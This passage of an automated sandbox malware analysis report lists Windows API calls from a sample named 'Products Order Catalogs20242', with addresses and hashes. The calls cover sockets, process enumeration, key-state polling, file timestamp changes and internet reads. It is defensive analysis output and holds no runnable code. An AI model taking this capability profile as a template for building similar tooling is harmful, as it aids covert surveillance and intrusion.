                                                                                                • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                                • String ID: HH
                                                                                                • API String ID: 1915432386-2761332787
                                                                                                • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: DEFINE$`$h$h
                                                                                                • API String ID: 0-4194577831
                                                                                                • Opcode ID: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                                                • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                • Opcode Fuzzy Hash: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                                                • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                APIs
                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$bindclosesocketsocket
                                                                                                • String ID:
                                                                                                • API String ID: 2609815416-0
                                                                                                • Opcode ID: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                                                • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                • Opcode Fuzzy Hash: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                                                • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                • _wcscat.LIBCMT ref: 004370BA
                                                                                                • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                • String ID:
                                                                                                • API String ID: 2547909840-0
                                                                                                • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                • String ID: *.*
                                                                                                • API String ID: 2693929171-438819550
                                                                                                • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                APIs
                                                                                                • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                • __wcsicoll.LIBCMT ref: 00436466
                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicollmouse_event
                                                                                                • String ID: DOWN
                                                                                                • API String ID: 1033544147-711622031
                                                                                                • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                APIs
                                                                                                  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                • String ID:
                                                                                                • API String ID: 4170576061-0
                                                                                                • Opcode ID: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                                                                                                • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                • Opcode Fuzzy Hash: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                                                                                                • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3539004672-0
                                                                                                • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                • IsWindowVisible.USER32 ref: 00477314
                                                                                                • IsWindowEnabled.USER32 ref: 00477324
                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                • IsIconic.USER32 ref: 0047733F
                                                                                                • IsZoomed.USER32 ref: 0047734D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                • String ID:
                                                                                                • API String ID: 292994002-0
                                                                                                • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                • String ID:
                                                                                                • API String ID: 3397143404-0
                                                                                                • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: ACCEPT$^$h
                                                                                                • API String ID: 909875538-4263704089
                                                                                                • Opcode ID: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                                                                                                • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                • Opcode Fuzzy Hash: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                                                                                                • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 3541575487-0
                                                                                                • Opcode ID: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                • Opcode Fuzzy Hash: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                • String ID:
                                                                                                • API String ID: 48322524-0
                                                                                                • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                APIs
                                                                                                • __time64.LIBCMT ref: 004433A2
                                                                                                  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                • String ID: rJ
                                                                                                • API String ID: 2893107130-1865492326
                                                                                                • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                APIs
                                                                                                • __time64.LIBCMT ref: 004433A2
                                                                                                  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                • String ID: rJ
                                                                                                • API String ID: 2893107130-1865492326
                                                                                                • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                APIs
                                                                                                • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                • String ID:
                                                                                                • API String ID: 901099227-0
                                                                                                • Opcode ID: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                                • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                • Opcode Fuzzy Hash: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                                • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0
                                                                                                • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
